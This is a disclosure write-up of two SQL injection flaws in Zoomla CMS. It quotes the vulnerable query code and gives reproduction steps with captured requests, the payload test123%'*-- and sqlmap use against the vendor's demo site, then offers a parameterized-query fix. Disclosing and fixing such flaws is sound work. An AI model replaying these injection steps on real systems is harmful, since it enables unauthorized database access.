Two generic SQL injections in Zoomla CMS (逐浪CMS)

Injection 1: http://demo.zoomla.cn/mis/target/page.aspx, the TxtKey parameter

[php]
string selectedValue = this.drType.SelectedValue;
string text = this.TxtKey.Text;
this.dt = this.bll.Sel(string.Concat(new string[]
{
    "ParentID=0 And Inputer='", this.buser.GetLogin().UserName,
    "' And type like '%", selectedValue,
    "%' And Title like '%", text, // no filtering; concatenated straight into the query, which is where the vulnerability comes from
    "%'"
}), "ID desc");
[/php]

Register a user on the front end. First go to http://demo.zoomla.cn/mis/target/AddTarget.aspx and add a target named test123. Then visit the following link: http://demo.zoomla.cn/mis/target/page.aspx and search for test123.

(screenshot: z1)

Capture the request and change test123 to test123%’*--

[php]
__VIEWSTATE=%2FwEPDwULLTEyMzkzMzg1NzcPZBYCAgMPZBYCAgcPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgExB3Rlc3QxMjNkZG7nnQ6pZXGUWElWkzGHXn71ZHNY&drType=&TxtKey=test123%’*--&Button1=%E6%90%9C%E7%B4%A2
[/php]

Feed it to sqlmap together with the cookie:

(screenshot: z2)
(screenshot: z3)

Injection point 2: http://demo.zoomla.cn/mis/addmis.aspx, the title parameter

[php]
protected void Button_Click(object sender, EventArgs e)
…
DataTable dataTable = this.bll.Sel("Title='" + this.TextTitle.Text.Trim() + "'", ""); // the title parameter is injectable: no filtering at all
…
[/php]

Enter some arbitrary information:

(screenshot: z4)

Click OK, then capture the request:

[php]
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMTY5OTMzNTg0ZGSXrsn5RKQ7H7z5jSEJzO1T2S1Tog%3D%3D&TextTitle=aaa&TextStatus=1&TextType=3&TextJoiner=a&StarDate=2013%2F10%2F24+10%3A50%3A01&EndDate=2013%2F10%2F24+10%3A50%3A04&TextContent=&BtnCommit=%E7%A1%AE%E5%AE%9A&ParentID=
[/php]

TextTitle=aaa is injectable. Feed it to sqlmap together with the cookie.

(screenshot: z5)
(screenshot: z6)
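Both snippets share one root cause: user-controlled text (TxtKey, drType, TextTitle) is concatenated into the WHERE clause that bll.Sel() receives, so the input becomes part of the SQL statement itself. The fix is to keep user input out of the statement text entirely and pass it as typed parameters. The following is an added example, not Zoomla's own code; it assumes a SQL Server backend accessed through System.Data.SqlClient and hypothetical tables named Target and Mis with the columns named in the two queries above. It shows the parameterized equivalent of both lookups, and also escapes LIKE wildcards so that a search term such as 50% is matched literally rather than as a pattern.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example (not from Zoomla CMS). Table and column names are assumptions.
public static class SafeMisQueries
{
    // Escape the characters that carry meaning inside a SQL Server LIKE pattern
    // (\ % _ [) so user text is matched literally. The SQL below declares ESCAPE '\'.
    public static string EscapeLike(string s)
    {
        return s.Replace("\\", "\\\\")
                .Replace("%", "\\%")
                .Replace("_", "\\_")
                .Replace("[", "\\[");
    }

    // Parameterized replacement for the first query (page.aspx: drType / TxtKey).
    // The statement text is a constant; the values travel as parameters, never as SQL,
    // so an input like  test123%'*--  is simply searched for as that literal string.
    public static DataTable SearchTargets(string connectionString, string userName, string type, string key)
    {
        const string sql =
            "SELECT * FROM Target " +
            "WHERE ParentID = 0 AND Inputer = @inputer " +
            "AND Type LIKE @type ESCAPE '\\' " +
            "AND Title LIKE @title ESCAPE '\\' " +
            "ORDER BY ID DESC";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@inputer", SqlDbType.NVarChar, 50).Value = userName;
            cmd.Parameters.Add("@type", SqlDbType.NVarChar, 100).Value = "%" + EscapeLike(type ?? "") + "%";
            cmd.Parameters.Add("@title", SqlDbType.NVarChar, 200).Value = "%" + EscapeLike(key ?? "") + "%";

            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(table); // Fill opens and closes the connection itself
            }
            return table;
        }
    }

    // Parameterized replacement for the second query (addmis.aspx: TextTitle).
    // Equality match, so no LIKE escaping is needed; Trim() mirrors the original code.
    public static DataTable FindMisByTitle(string connectionString, string title)
    {
        const string sql = "SELECT * FROM Mis WHERE Title = @title";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@title", SqlDbType.NVarChar, 200).Value = (title ?? "").Trim();

            var table = new DataTable();
            using (var adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(table);
            }
            return table;
        }
    }
}
```

If the data layer's Sel() method can only accept a raw WHERE string, the right change is to add an overload that takes a parameter collection rather than to escape quotes in the caller: quote escaping is fragile across character sets and LIKE patterns, while a parameter is never interpreted as SQL regardless of its content.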
